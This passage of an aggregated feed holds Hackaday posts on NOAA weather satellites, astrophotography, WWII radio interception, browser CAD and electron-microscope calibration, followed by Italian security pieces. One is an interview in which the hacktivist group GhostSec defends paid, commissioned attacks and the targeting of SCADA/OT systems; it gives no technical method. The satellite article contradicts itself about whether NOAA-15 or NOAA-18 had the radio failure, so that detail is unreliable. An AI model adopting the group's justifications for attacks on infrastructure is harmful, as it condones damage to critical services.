Further, the APT, LRPT, and HRPT services were to remain active and operate as before. The only difference now would be that the agency couldn’t guarantee how long the data would be available. Should there be any errors or failures on the spacecraft, NOAA won’t address them. In official government parlance, from June 16th, the feeds from the satellites would be considered unsuitable for “operational use.”

In other words, NOAA-15, NOAA-18, and NOAA-19 are free to beam Earth images down to anyone who cares to listen, but when they stop working, they will very likely stop working for good.

NOAA-18’s Early Retirement

As it turns out, it wouldn’t take long before this new arrangement was put to the test. At the end of May, NOAA-15’s S-band radio suffered some sort of failure, causing its output power to drop from its normal 7 watts down to approximately 0.8 watts. This significantly degraded both the downlinked images and the telemetry coming from the spacecraft. This didn’t just make reception by hobbyists more difficult. Even NOAA’s ground stations were having trouble sifting through the noise to get any useful data. To make matters even worse, the failing radio was also the only one left onboard the spacecraft that could actually receive commands from the ground.

While the transmission power issue seemed intermittent, there was clearly something very wrong with the radio, and there was no backup unit to switch over to. Concerned that they might lose control of the satellite entirely, ground controllers quickly made the decision to decommission NOAA-18 on June 6th.

Due to their limited propulsion systems, the POES satellites are unable to de-orbit themselves. So the decommissioning process instead tries to render the spacecraft as inert as possible. This includes turning off all transmitters, venting any remaining propellant into space, and finally, disconnecting all of the batteries from their chargers so they will eventually go flat.

At first glance, this might seem like a rash decision. After all, it was just a glitchy transmitter. What does it matter if NOAA wasn’t planning on using any more data from the satellite in a week or two anyway? But the decision makes more sense when you consider the fate of earlier NOAA POES satellites.

Curse of the Big Four

When one satellite breaks up in orbit, it’s an anomaly. When a second one goes to pieces, it’s time to start looking for commonality between the events. But when four similar spacecraft all explode in the same way…it’s clear you’ve got a serious problem.

That’s precisely what happened with NOAA-16, NOAA-17, and two of their counterparts from the Defense Meteorological Satellite Program (DMSP), DMSP F11, and DMSP F13, between 2015 and 2021. While it’s nearly impossible to come to a definitive conclusion about what happened to the vehicles, collectively referred to as the “Big Four” in the NOAA-17 Break-up Engineering Investigation’s 2023 report, the most likely cause is a violent rupture of the craft’s Ni-Cd battery pack due to extreme overcharging.

What’s interesting is that NOAA-16 and 17, as well as DMSP F11, had gone through the decommissioning process before their respective breakups. As mentioned earlier, the final phase of the deactivation process is the disconnection of all batteries from the charging system. The NOAA-17 investigation was unable to fully explain how the batteries on these spacecraft could have become overcharged in this state, but speculated it may be possible that some fault in the electrical system inadvertently allowed the batteries to be charged through what normally would have been a discharge path.

As such, there’s no guarantee that the now decommissioned NOAA-18 is actually safe from a design flaw that destroyed its two immediate predecessors. But considering the risk of not disconnecting the charge circuits on a spacecraft design that’s known to be prone to overcharging its batteries, it’s not hard to see why NOAA went ahead with the shutdown process while they still had the chance.

The Future of Satellite Sniffing

GOES-16 Image, Credit: USRadioguy.com
While there are no immediate plans to decommission NOAA-15 and 19, it’s clear that the writing is on the wall. Especially considering the issues NOAA-15 has had in the past. These birds aren’t getting any younger, and eventually they’ll go dark, especially now that they’re no longer being actively managed.

So does that mean the end of DIY satellite imagery? Thankfully, no. While it’s true that NOAA-15 and 19 are the only two satellites still transmitting the analog APT protocol, the digital LRPT and HRPT protocols are currently in use by the latest Russian weather satellites. Meteor-M 2-3 was launched in June 2023, and Meteor-M 2-4 went up in February 2024, so both should be around for quite some time. In addition, at least four more satellites in the Meteor-M family are slated for launch by 2042.

So, between Russia’s Meteor fleet and the NOAA GOES satellites in geosynchronous orbit, hobbyists should still have plenty to point their antennas at in the coming years.

Want to grab your own images? There are tutorials. You can even learn how to listen to the Russian birds.

hackaday.com/2025/06/12/end-of…

Astrophotography isn’t easy. Even with good equipment, simply snapping a picture of the night sky won’t produce anything particularly impressive. You’ll likely just get a black void with a few pinpricks of light for your troubles. It takes some editing magic to create stunning images of the cosmos, and luckily [Karl Perera] has a guide to help get you started.

The guide demonstrates a number of editing techniques specifically geared to bring the extremely dim lights of the stars into view, using Photoshop and additionally a free software tool called Siril specifically designed for astrophotograpy needs. The first step on an image is to “stretch” it, essentially expanding the histogram by increasing the image’s contrast. A second technique called curve adjustment performs a similar procedure for smaller parts of the image. A number of other processes are performed as well, which reduce noise, sharpen details, and make sure the image is polished.

While the guide does show some features of non-free software like Photoshop, it’s not too hard to extrapolate these tasks into free software like Gimp. It’s an excellent primer for bringing out the best of your astrophotography skills once the pictures have been captured, though. And although astrophotography itself might have a reputation as being incredibly expensive just to capture those pictures in the first place, it can be much more accessible by using this Pi-based setup as a starting point.

youtube.com/embed/2cNANnSnJBs?…

hackaday.com/2025/06/12/learni…

I often ask people: What’s the most important thing you need to have a successful fishing trip? I get a lot of different answers about bait, equipment, and boats. Some people tell me beer. But the best answer, in my opinion, is fish. Without fish, you are sure to come home empty-handed.

On a recent visit to Bletchley Park, I thought about this and how it relates to World War II codebreaking. All the computers and smart people in the world won’t help you decode messages if you don’t already have the messages. So while Alan Turing and the codebreakers at Bletchley are well-known, at least in our circles, fewer people know about Arkley View.

The problem was apparent to the British. The Axis powers were sending lots of radio traffic. It would take a literal army of radio operators to record it all. Colonel Adrian Simpson sent a report to the director of MI5 in 1938 explaining that the three listening stations were not enough. The proposal was to build a network of volunteers to handle radio traffic interception.

That was the start of the Radio Security Service (RSS), which started operating out of some unused cells at a prison in London. The volunteers? Experienced ham radio operators who used their own equipment, at first, with the particular goal of intercepting transmissions from enemy agents on home soil.

At the start of the war, ham operators had their transmitters impounded. However, they still had their receivers and, of course, could all read Morse code. Further, they were probably accustomed to pulling out Morse code messages under challenging radio conditions.

Over time, this volunteer army of hams would swell to about 1,500 members. The RSS also supplied some radio gear to help in the task. MI5 checked each potential member, and the local police would visit to ensure the applicant was trustworthy. Keep in mind that radio intercepts were also done by servicemen and women (especially women) although many of them were engaged in reporting on voice communication or military communications.

Early Days

The VIs (voluntary interceptors) were asked to record any station they couldn’t identify and submit a log that included the messages to the RSS.

Arkey View ([Aka2112] CC-BY-SA-3.0)The hams of the RSS noticed that there were German signals that used standard ham radio codes (like Q signals and the prosign 73). However, these transmissions also used five-letter code groups, a practice forbidden to hams.

Thanks to a double agent, the RSS was able to decode the messages that were between agents in Europe and their Abwehr handlers back in Germany (the Abwehr was the German Secret Service) as well as Abwehr offices in foreign cities. Later messages contained Enigma-coded groups, as well.

Between the RSS team’s growth and the fear of bombing, the prison was traded for Arkley View, a large house near Barnet, north of London. Encoded messages went to Bletchley and, from there, to others up to Churchill. Soon, the RSS had orders to concentrate on the Abwehr and their SS rivals, the Sicherheitsdienst.

Change in Management

In 1941, MI6 decided that since the RSS was dealing with foreign radio traffic, they should be in charge, and thus RSS became SCU3 (Special Communications Unit 3).

There was fear that some operators might be taken away for normal military service, so some operators were inducted into the Army — sort of. They were put in uniform as part of the Royal Corps of Signals, but not required to do very much you’d expect from an Army recruit.

Those who worked at Arkley View would process logs from VIs and other radio operators to classify them and correlate them in cases where there were multiple logs. One operator might miss a few characters that could be found in a different log, for example.

Going 24/7

National HRO Receiver ([LuckyLouie] CC-BY-SA-3.0)It soon became clear that the RSS needed full-time monitoring, so they built a number of Y stations with two National HRO receivers from America at each listening position. There were also direction-finding stations built in various locations to attempt to identify where a remote transmitter was.

Many of the direction finding operators came from VIs. The stations typically had four antennas in a directional array. When one of the central stations (the Y stations) picked up a signal, they would call direction finding stations using dedicated phone lines and send them the signal.
Map of the Y-stations (interactive map at the Bletchley Park website)
The operator would hear the phone signal in one ear and the radio signal in the other. Then, they would change the antenna pattern electrically until the signal went quiet, indicating the antenna was electrically pointing away from the signals.

The DF operator would hear this signal in one earpiece. They would then tune their radio receiver to the right frequency and match the signal from the main station in one ear to the signal from their receiver in the other ear. This made sure they were measuring the correct signal among the various other noise and interference. The DF operator would then take a bearing by rotating the dial on their radiogoniometer until the signal faded out. That indicated the antenna was pointing the wrong way which means you could deduce which way it should be pointing.

The central station could plot lines from three direction finding stations and tell the source of a transmission. Sort of. It wasn’t incredibly accurate, but it did help differentiate signals from different transmitters. Later, other types of direction-finding gear saw service, but the idea was still the same.

Interesting VIs

Most of the VIs, like most hams at the time, were men. But there were a few women, including Helena Crawley. She was encouraged to marry her husband Leslie, another VI, so they could be relocated to Orkney to copy radio traffic from Norway.

In 1941, a single VI was able to record an important message of 4,429 characters. He was bedridden from a landmine injury during the Great War. He operated from bed using mirrors and special control extensions. For his work, he receive the British Empire Medal and a personal letter of gratitude from Churchill.

Results

Because of the intercepts of the German spy agency’s communications, many potential German agents were known before they arrived in the UK. Of about 120 agents arriving, almost 30 were turned into double agents. Others were arrested and, possibly, executed.

By the end of the war, the RSS had decoded around a quarter of a million intercepts. It was very smart of MI5 to realize that it could leverage a large number of trained radio operators both to cover the country with receivers and to free up military stations for other uses.

Meanwhile, on the other side of the Atlantic, the FCC had a similar plan.

The BBC did a documentary about the work the hams did during the war. You can watch it below.

youtube.com/embed/RwbzV2Jx5Qo?…

hackaday.com/2025/06/12/crowds…

A cura di Aldo Di Mattia, Director of Specialized Systems Engineering and Cybersecurity Advisor Italy and Malta di Fortinet

Nel 2024 i cyber criminali hanno intensificato in modo significativo gli attacchi alle infrastrutture critiche, sia in Italia che a livello globale. Come emerge dai dati dei FortiGuard Labs pubblicati nell’ultimo Rapporto Clusit, l’Italia è stata colpita dal 2,91% delle minacce globali, un aumento significativo rispetto allo 0,79% dell’anno precedente. Si tratta di una fotografia chiara della crescente esposizione del Paese agli attacchi informatici, che coinvolgono tutte le categorie di attori: cyber criminali mossi da interessi economici, gruppi hacktivisti e attacchi sponsorizzati da governi.

I dati rilevati dai FortiGuard Labs non si limitano ai soli incidenti pubblicamente noti, ma comprendono anche le attività di scansione, gli attacchi rilevati e i malware, offrendo così una prospettiva più completa. In particolare, di rilievo è l’aumento rilevato delle Active Scanning Techniques in Italia, che nel 2024 hanno registrato un incremento del 1.076%, passando da 4,21 miliardi a 49,46 miliardi. Il dato relativo alle attività di ricognizione (reconnaissance) è quello che maggiormente preoccupa, inquanto qui sono incluse le tecniche attive e passive con cui gli attaccanti raccolgono informazioni su infrastrutture, persone e sistemi da colpire. Questo tipo di attività rappresenta un campanello d’allarme importante: laddove c’è un’intensa attività di raccolta di informazioni, ci si deve aspettare l’esecuzione di attacchi più mirati e sofisticati.
Aldo Di Mattia, Director of Specialized Systems Engineering and Cybersecurity Advisor Italy and Malta di Fortinet
Anche gli attacchi Denial of Service (DoS) hanno visto un’escalation da non sottovalutare: da 657,06 milioni a oltre 4,22 miliardi in Italia (+542,42%), e da 576,63 miliardi a 1,07 trilioni a livello globale (+85,25%).

Dal punto di vista settoriale, i dati mostrano come la Sanità e le Telecomunicazioni siano i comparti più bersagliati a livello globale: 232,8 miliardi di tentativi di attacco alle infrastrutture sanitarie e 243 miliardi verso le Telco. A seguire, il settore Energy & Utilities con 22,4 miliardi, il comparto Trasporti e Logistica con 10,8 miliardi, e infine il Finance e il Government con, rispettivamente, 72,2 e 60,3 miliardi di attacchi. In Italia, invece, il comparto manifatturiero emerge come il principale obiettivo dei cyber criminali, sia per la sua importanza strategica che per la relativa vulnerabilità strutturale delle PMI, spesso prive di adeguati sistemi di difesa.

Deception, Threat Intelligence e Intelligenza Artificiale: l’innovazione al servizio della sicurezza informatica

Per fronteggiare questo scenario, è fondamentale per le aziende adottare tecnologie avanzate che permettano non solo di rilevare tempestivamente gli attacchi, ma anche di prevenirli e neutralizzarli. Deception, Threat Intelligence e Intelligenza Artificiale rappresentano oggi alcuni degli strumenti più efficaci, ma troppo spesso ancora sottoutilizzati.

Le tecnologie di Deception, ad esempio, consentono di creare “trappole” e asset virtuali che confondono gli attaccanti, rallentano le loro operazioni e forniscono indicazioni preziose sulle tecniche utilizzate. La Threat Intelligence permette invece di anticipare le mosse dei cyber criminali grazie all’analisi e alla condivisione di informazioni sulle minacce. Infine, l’Intelligenza Artificiale, nella somma degli algoritmi più utilizzati (Machine Learning, Deep Neural Network, GenAI), consente di rilevare anomalie comportamentali, automatizzare la risposta agli incidenti, avere supporto in tutte le fasi di analisi e risposta, gestire enormi volumi di dati in tempo reale e molto altro ancora.

In questo contesto, è importante sottolineare che l’IA oggi rappresenta un’arma a doppio taglio. Se da un lato migliora la capacità difensiva, dall’altro è utilizzata anche dagli attaccanti per automatizzare campagne di phishing, generare deepfake, scrivere codice malevolo e aggirare i controlli di identità. I modelli linguistici di grandi dimensioni (LLM) sono già impiegati per creare script in grado di compromettere infrastrutture OT, come impianti industriali, reti elettriche, trasporti e persino sistemi finanziari.

Formazione e awareness: come costruire una solida cultura di cybersecurity

La tecnologia, però, da sola non è sufficiente. Per rispondere a uno scenario di minacce in continua ascesa ed evoluzione, è fondamentale rafforzare la consapevolezza e la cultura della cybersecurity a tutti i livelli, a partire dai dipendenti delle organizzazioni fino ad arrivare agli studenti. Gli attacchi di phishing, sempre più sofisticati grazie all’uso dell’IA, puntano infatti a colpire proprio l’anello più debole della catena: l’essere umano.

Secondo il Security Awareness and Training Global Research Report di Fortinet, in Italia, l’86% dei responsabili aziendali considera positivamente i programmi di formazione sulla sicurezza informatica, e l’84% dichiara di aver osservato miglioramenti concreti nella postura di sicurezza della propria organizzazione. Tuttavia, affinché la formazione sia efficace, deve essere coinvolgente, ben progettata e calibrata.

Per rispondere a queste esigenze, Fortinet ha avviato diversi programmi educativi, come il Fortinet Academic Program, attivo da anni nelle università, che offre materiale gratuito, laboratori cloud e voucher per certificazioni. Di particolare rilievo, inoltre, è il nuovo progetto rivolto alle scuole elementari, medie e superiori italiane, che ha l’obiettivo di estendere la formazione in materia di sicurezza informatica tra i più giovani a livello nazionale. L’iniziativa punta non solo a diffondere la cultura della cybersecurity, ma anche a colmare il gap di competenze che oggi rappresenta uno dei principali ostacoli alla sicurezza digitale del Paese.

Partnership pubblico-privato: la forza della cooperazione per essere sempre un passo avanti al cybercrime

Per costruire un sistema di difesa solido e resiliente è fondamentale che aziende, istituzioni e organizzazioni collaborino. La cybersecurity non può più essere affrontata come una battaglia individuale: occorre un ecosistema coeso, in cui le competenze e le risorse vengano condivise.

In linea con questa visione, Fortinet ha recentemente siglato un protocollo d’intesa con l’Agenzia per la Cybersicurezza Nazionale (ACN). Il protocollo è finalizzato alla successiva definizione di accordi attuativi che prevedono potenziali aree di collaborazione su diversi temi, quali la condivisione di best practice, lo scambio di informazioni, metodi di analisi e programmi di cyber threat intelligence, e la possibilità di intraprendere iniziative su temi quali la formazione con la realizzazione di eventi educativi sul territorio destinati a diffondere e aumentare la consapevolezza dei rischi legati alla cybersecurity e le conoscenze in materia. Un protocollo di intesa analogo è stato firmato con la Polizia Postale.

Queste collaborazioni si inseriscono in un impegno più ampio, che vede Fortinet attiva anche in iniziative internazionali come la Partnership Against Cybercrime (PAC) e il Cybercrime Atlas del World Economic Forum. Quest’ultimo progetto, di cui Fortinet è membro fondatore, mira a mappare le infrastrutture e le reti utilizzate dai cyber criminali, offrendo una visione globale per coordinare strategie di contrasto mirate.

Le nuove normative europee, come Dora e NIS2, rappresentano un altro passo avanti verso una maggiore resilienza. Dora punta a garantire la continuità operativa delle entità finanziarie in caso di attacchi informatici, mentre NIS2 estende gli obblighi di sicurezza anche a fornitori e partner della supply chain. I dati suggeriscono che queste normative stiano già producendo effetti positivi, contribuendo a una riduzione degli incidenti nei settori regolamentati.

Guardare al futuro con una visione integrata IT/OT

Gli attacchi informatici in futuro saranno sempre più sofisticati, automatizzati e difficili da individuare. I criminali sfrutteranno l’IA agentiva per condurre campagne mirate in modo autonomo, eludere i sistemi di difesa e manipolare infrastrutture fisiche e digitali. In questo scenario, sarà quindi essenziale garantire anche la sicurezza dei sistemi di intelligenza artificiale, diventati a tutti gli effetti bersagli e strumenti di attacco.

Il perimetro della difesa non può più essere limitato ai confini tecnici dell’IT. Occorre una visione integrata che abbracci l’IT e l’OT, coinvolga le persone, promuova la formazione e favorisca la cooperazione tra pubblico e privato. Solo così sarà possibile affrontare con successo le sfide di cybersecurity che ci attendono, nel 2025 e oltre, sia come singole organizzazioni ma anche, e soprattutto, a livello Paese.

L'articolo Cybersecurity, infrastrutture critiche e difesa del sistema Paese: tecnologia e cultura per vincere le sfide del futuro proviene da il blog della sicurezza informatica.

Some people love tools in their browsers. Others hate them. We certainly do like to see just how far people can push the browser and version 0.6 of CHILI3D, a browser-based CAD program, certainly pushes.

If you click the link, you might want to find the top right corner to change the language (although a few messages stubbornly refuse to use English). From there, click New Document and you’ll see an impressive slate of features in the menus and toolbars.

The export button is one of those stubborn features. If you draw something and select export, you’ll see a dialog in Chinese. Translated it has the title: Select and a checkmark for “Determined” and a red X for “Cancelled.” If you select some things in the drawing and click the green checkmark, it will export a brep file. That file format is common with CAD programs, but you’ll need to convert, probably, if you want to 3D print your design.

The project’s GitHub repository shows an impressive slate of features, but also notes that things are changing as this is alpha software. The CAD kernel is a common one brought in via WebAssembly, so there shouldn’t be many simple bugs involving geometry.

We’ve seen a number of browser-based tools that do some kind of CAD. CADmium is a recent entry into the list. Or, stick with OpenSCAD. We sometimes go low-tech for schematics.

hackaday.com/2025/06/12/open-s…

It’s a problem that few of us will ever face, but if you ever have to calibrate your scanning electron microscope, you’ll need a resolution target with a high contrast under an electron beam. This requires an extremely small pattern of alternating high and low-density materials, which [ProjectsInFlight] created in his latest video by depositing gold nanoparticles on a silicon slide.

[ProjectsInFlight]’s scanning electron microscope came from a lab that discarded it as nonfunctional, and as we’ve seen before, he’s since been getting it back into working condition. When it was new, it could magnify 200,000 times and resolve features of 5.5 nm, and a resolution target with a range of feature sizes would indicate how high a magnification the microscope could still reach. [ProjectsInFlight] could also use the target to make before-and-after comparisons for his repairs, and to properly adjust the electron beam.

Since it’s easy to get very flat silicon wafers, [ProjectsInFlight] settled on these as the low-density portion of the target, and deposited a range of sizes of gold nanoparticles onto them as the high-density portion. To make the nanoparticles, he started by dissolving a small sample of gold in aqua regia to make chloroauric acid, then reduced this back to gold nanoparticles using sodium citrate. This gave particles in the 50-100 nanometer range, but [ProjectsInFlight] also needed some larger particles. This proved troublesome for a while, until he learned that he needed to cool the reaction temperature solution to near freezing before making the nanoparticles.

Using these particles, [ProjectsInFlight] was able to tune the astigmatism settings on the microscope’s electron beam so that it could clearly resolve the larger particles, and just barely see the smaller particles – quite an achievement considering that they’re under 100 nanometers across!

Electron microscopes are still a pretty rare build, but not unheard-of. If you ever find one that’s broken, it could be a worthwhile investment.

youtube.com/embed/p6Gs3yXEM8k?…

hackaday.com/2025/06/12/diy-ca…

Ghost Security, noto anche come GhostSec, è un gruppo hacktivista emerso nel contesto della guerra cibernetica contro l’estremismo islamico. Le sue prime azioni risalgono alla fase successiva all’attacco alla redazione di Charlie Hebdo nel gennaio 2015. È considerato una propaggine del collettivo Anonymous, da cui in seguito si è parzialmente distaccato. GhostSec è diventato noto per le sue offensive digitali contro siti web, account social e infrastrutture online utilizzate dall’ISIS per diffondere propaganda e coordinare attività terroristiche.

Il gruppo ha dichiarato di aver chiuso centinaia di account affiliati all’ISIS e di aver contribuito a sventare potenziali attacchi terroristici, collaborando attivamente con forze dell’ordine e agenzie di intelligence. GhostSec ha anche hackerato un sito dark web dell’ISIS, sostituendo la pagina con una pubblicità per il Prozac: un’azione tanto simbolica quanto provocatoria. Il gruppo promuove le sue attività attraverso hashtag come #GhostSec, #GhostSecurity e #OpISIS.

Nel 2015, dopo gli attacchi di Parigi, Anonymous lanciò la sua più grande operazione contro il terrorismo, e GhostSec giocò un ruolo chiave nella battaglia informatica. In seguito a una maggiore collaborazione con le autorità, una parte del gruppo decise di “legittimarsi” dando vita al Ghost Security Group, staccandosi da Anonymous. Tuttavia, alcuni membri contrari a questa svolta mantennero il nome originale “GhostSec”, proseguendo la propria missione all’interno del network Anonymous.

Nel tempo, l’attività di GhostSec si è estesa oltre il fronte anti-ISIS. Con lo scoppio del conflitto tra Russia e Ucraina, il gruppo ha preso una posizione netta a favore di Kiev. Nel luglio 2022, GhostSec ha rivendicato un attacco alla centrale idroelettrica di Gysinoozerskaya, in Russia, che ha provocato un incendio e l’interruzione della produzione energetica. Il gruppo ha sottolineato come l’attacco sia stato pianificato in modo da evitare vittime civili, dimostrando un’etica operativa molto specifica.

Red Hot Cyber ha recentemente richiesto un’intervista a GhostSec. Una decisione in linea con la nostra filosofia: per contrastare davvero le minacce, occorre conoscere i demoni. È solo ascoltando ciò che dicono — analizzando i loro metodi, le motivazioni, i bersagli — che possiamo rafforzare la resilienza informatica delle nostre infrastrutture critiche.

La voce di GhostSec, se ascoltata con attenzione critica, può contribuire ad arricchire il dibattito sulla cybersecurity contemporanea, sull’etica dell’hacktivismo e sul delicato equilibrio tra sicurezza e legittimità nell’era della guerra ibrida.

1 RHC – Salve, e grazie per averci dato l’opportunità di intervistarvi. In molte delle nostre interviste con gli autori di minacce, di solito iniziamo chiedendo l’origine e il significato del nome del loro gruppo. Potrebbe raccontarci la storia dietro il suo nome?

GhostSec: Siamo GhostSec, il nostro nome non ha molto da dire, se non che risale a un periodo molto più critico su Internet. Inizialmente eravamo attivi dal 2014 con un nome diverso, ma la nostra vera ascesa è avvenuta nel 2015, durante i nostri attacchi contro l’ISIS, che abbiamo causato danni ingenti come nessun altro era riuscito a fare. Tra questi, il fatto di essere riusciti a fermare due attacchi in quel periodo.

2 RHC – Vi abbiamo conosciuti per la prima volta nel 2015 durante l’operazione #OpISIS, ma da allora il vostro gruppo ha attraversato diverse vicende e divisioni interne. Oggi, tra hacktivismo, criminali informatici a scopo di lucro e attori sponsorizzati dallo stato, esiste ancora una forma di autentico hacktivismo, libero da interessi economici?

GhostSec: Il costo e il rischio dell’hacktivismo non sono più gratuiti come lo erano un tempo, le cose sono cambiate e servono soldi almeno per finanziare le operazioni di un hacktivista. Esiste una forma di hacktivismo autentico, ma richiederà sempre dei finanziamenti: alcuni di questi hacktivisti potrebbero ottenerli richiedendo donazioni, altri vendendo database e altri ancora potrebbero puntare su progetti più grandi. A un certo punto anche noi abbiamo dovuto commettere crimini informatici per trarne profitto per continuare a finanziare le nostre operazioni. Quindi, in mezzo a tutto questo caos, la risposta è sì, esiste ancora un vero hacktivismo e veri hacktivisti, noi compresi, anche se è chiaro che anche il denaro fa muovere il mondo. E il potere senza denaro non sarà altrettanto efficace.

3 RHC – Siamo rimasti piuttosto colpiti dal fatto che un’azienda italiana possa aver commissionato a un gruppo di hacktivisti un attacco contro un governo. È mai successo prima che aziende private si rivolgessero a voi per colpire altre organizzazioni o enti statali?

GhostSec: Quella è stata la prima volta, ma non l’ultima. Senza dire troppo, noi hacktivisti possiamo scegliere cosa accettare e se è in linea con le nostre motivazioni e ha un vantaggio, in più riceviamo il bonus di essere pagati, è sempre una buona cosa. Per essere chiari, però, si trattava di un’azienda privata, ma sappiamo che è legata al governo.

4 RHC – Quanto è diffusa la pratica delle aziende private di commissionare attacchi informatici a gruppi di hacker ?

GhostSec: Oggigiorno, dato che tutto sta diventando più tecnologico e i vecchi metodi di gestione delle cose stanno scomparendo, presumo che diventerà più comune che non si tratti solo di enti governativi, ma anche di aziende corrotte che cercano di sbarazzarsi della concorrenza o potrebbero verificarsi concetti simili.

5 RHC – Secondo voi, qual è il confine tra l’hacking come atto di protesta politica e l’hacking come crimine? Come ritieni che le vostre azioni si inseriscano nella società?

GhostSec: Gli hacktivist possono fare molto di più che attacchi DDoS e defacement per fare una dichiarazione. Il limite si traccia davvero quando gli innocenti iniziano a entrare in gioco o a farsi male a causa degli attacchi in corso, ad esempio se l’hacktivist commette frodi con carte di credito o cose simili, è considerato semplicemente un crimine informatico. Le nostre azioni e le azioni degli altri hacktivist sono necessarie nella società, ma parlando per noi i nostri attacchi sono molto più grandi dei semplici attacchi DDoS o defacement, le nostre diverse violazioni, gli hack SCADA / OT e altro lasciano un impatto nel mondo e nelle situazioni in corso. Crediamo che la nostra espansione e il nostro “accettare” potenziali contratti che si allineano anche con la nostra agenda e le nostre motivazioni non siano sbagliati e lascino solo un impatto ancora maggiore sul mondo mentre guadagniamo anche un po’ di soldi.

6 RHC – Il vostro gruppo è stato particolarmente attivo nel targeting degli ambienti SCADA e ICS.
Dal punto di vista CTI, cosa guida questo focus strategico? Questi obiettivi vengono scelti per il loro valore simbolico, l’impatto operativo o per altri motivi?

GhostSec: vengono scelti per il loro impatto e valore. I sistemi OT e SCADA, quando attaccati, hanno un impatto fisico, quindi oltre alle tipiche violazioni e rivelazioni, rivelare informazioni con un impatto fisico è anche molto dannoso per il bersaglio.

7 RHC – Abbiamo osservato un crescente interesse per i sistemi ICS da parte di altri gruppi di minaccia come SECTOR16 e CYBER SHARK. Ritiene che le infrastrutture ICS/OT siano oggi adeguatamente protette? Dalla nostra valutazione, molti di questi ambienti sono implementati e gestiti da integratori con poca o nessuna formazione in materia di sicurezza informatica, creando importanti superfici di attacco. Qual è la vostra opinione?

GhostSec: Non sono adeguatamente protetti e avete ragione, molti di essi vengono implementati e gestiti con pochissima attenzione sulla sicurezza, anche dopo un attacco, spesso non prendono la sicurezza sul serio. Ci sono alcuni casi in cui i dispositivi OT possono essere adeguatamente protetti e isolati, ma nella maggior parte dei casi, e il più comune, è che sono facili da trovare e ancora più facili da violare.

8 RHC – Abbiamo osservato una crescente attenzione verso i sistemi di sorveglianza e le infrastrutture di videosorveglianza. Puoi spiegare le motivazioni alla base del targeting delle tecnologie CCTV o VMS? Si tratta di visibilità, controllo o invio di un messaggio?

GhostSec: Quando si tratta di una nazione non in guerra, personalmente non vedo l’interesse dietro a questa cosa, a parte il fatto che è un po’ inquietante, ma se diciamo di poter accedere alle infrastrutture di videosorveglianza o di videosorveglianza in Israele, o in aree specifiche in Libano, Siria, Yemen e altre nazioni in guerra, possiamo avere riprese dirette di potenziali prove. Questo sarebbe un caso d’uso reale, mentre un altro potrebbe essere se un aggressore stesse hackerando un obiettivo e volesse vedere la reazione o ottenere riprese dell’attacco in tempo reale, lol, avere un feed video sarebbe fantastico.

9 RHC – Il vostro gruppo considera anche i sistemi di videosorveglianza (come le piattaforme CCTV e VMS) come obiettivi validi o generalmente preferite evitarli? C’è una specifica motivazione operativa o etica dietro questa scelta?

GhostSec: Come detto in precedenza, generalmente li evitiamo a meno che non siano necessari o utili per l’operazione su cui stiamo lavorando. Se la videosorveglianza è quella di una casa o di un negozio e viene accidentalmente lasciata aperta, è completamente inutile per noi usarla. Non c’è un vero e proprio caso d’uso dietro.

10 RHC – Tornando alla questione discussa nell’intervista a DarkCTI: saresti disponibile a condividere maggiori dettagli su quanto accaduto con l’azienda italiana che avrebbe commissionato attacchi contro la Macedonia del Nord e successivamente contro un obiettivo sardo? Sono ancora in corso trattative o l’azienda si è rifiutata categoricamente di pagare per i servizi forniti? Qualsiasi ulteriore contesto che potessi condividere sarebbe estremamente prezioso per comprendere le implicazioni di tali operazioni.

GhostSec: Condivideremo presto maggiori dettagli sul nostro canale Telegram su quanto accaduto e questa volta discuteremo effettivamente dei nomi coinvolti e altro ancora. Non ci sono state trattative, abbiamo cercato di negoziare e parlare, ma a un certo punto hanno iniziato a fare ghosting, il che è ironico, lo sappiamo, e anche dopo gli avvertimenti hanno continuato a ignorarci, il che ci ha portato alla pubblicazione che abbiamo fatto. Questa azienda ci ha assunto inizialmente per cambiare alcune cose in MK, il che era per il meglio per il paese, poi abbiamo fatto un po’ di lavoro difensivo e dopo un po’ il MOD e il MOI in MK avevano bisogno che iniziassimo a occuparci di diverse questioni. L’azienda italiana ci ha poi anche incaricato di occuparci di un’azienda in Sardegna che presumiamo fosse concorrente, anche se vorremmo dire che questa azienda se lo meritava, dato che era coinvolta in varie cose fottute di sua proprietà, comprese operazioni in Medio Oriente, Europa e hanno avuto attività direttamente in Italia.

11 RHC – A un certo punto della storia di GhostSec, si è verificata una scissione significativa: alcuni membri sono passati al Ghost Security Group, allineandosi alle operazioni white hat e persino collaborando con agenzie governative, mentre altri sono rimasti fedeli al percorso originale, continuando le attività nell’ambito black hat. Potresti raccontarci di più su questa scissione? Quali sono state le motivazioni principali alla base e in che modo ha influenzato l’identità e la strategia del gruppo così come si presenta oggi?

GhostSec: La scissione non aveva motivazioni chiave se non il tentativo del governo statunitense di rovinarci o di trasformarci in risorse per loro. Non c’è molto da dire oltre a questo sulle motivazioni di chi si è unito, il che è comprensibile, e chi è rimasto non voleva essere al guinzaglio come cani: cerchiamo la nostra libertà e la gioia nella nostra arte dell’hacking. Grazie alla scissione e alla fedeltà a noi stessi, siamo riusciti a crescere ulteriormente, senza guinzagli, avendo completa libertà decisionale, e siamo andati oltre la semplice caccia al terrorismo.

12 RHC – Cosa vede nel futuro del modello Ransomware -as-a-Service (RaaS)?
Il numero delle vittime è ancora in aumento – ad esempio, solo in Italia si sono registrate 71 vittime confermate di ransomware dall’inizio del 2025 – eppure il numero di riscatti pagati sembra essere piuttosto basso. A vostro avviso, come si adatteranno gli attori della minaccia a questa situazione? Prevede nuove strategie di monetizzazione o un cambiamento nelle tattiche per aumentare la pressione sulle vittime?

GhostSec: alla fine, se sempre meno persone pagheranno, dovranno cambiare completamente la strategia di monetizzazione. Mentre alcuni gruppi continueranno a usare il ransomware, dato che è in circolazione da molto tempo, coloro che continueranno a farlo potrebbero trovare nuovi modi per aumentare la pressione. Mentre la maggior parte passerà ad altre strategie di monetizzazione in base alle tendenze del momento.

13 RHC – Se dovessi consigliare a un’azienda da dove iniziare per diventare resiliente contro attacchi informatici come il tuo, cosa consiglieresti?

GhostSec: Un budget per la sicurezza informatica è un ottimo inizio, ma è molto più di questo. Un budget per la formazione dei dipendenti è fondamentale per comprendere e prevenire gli attacchi di social engineering. Ad esempio, un budget destinato ai pentest trimestrali è ottimo, in quanto ogni trimestre si avrà un controllo completo della sicurezza. Questi sono alcuni requisiti per garantire una maggiore resilienza.

14 RHC – Molti gruppi si definiscono hacktivisti, ma spesso si scopre che operano per conto di governi o con fini finanziari. Secondo voi, quali sono i criteri che distinguono veramente un hacktivista da un criminale informatico o da un mercenario digitale?

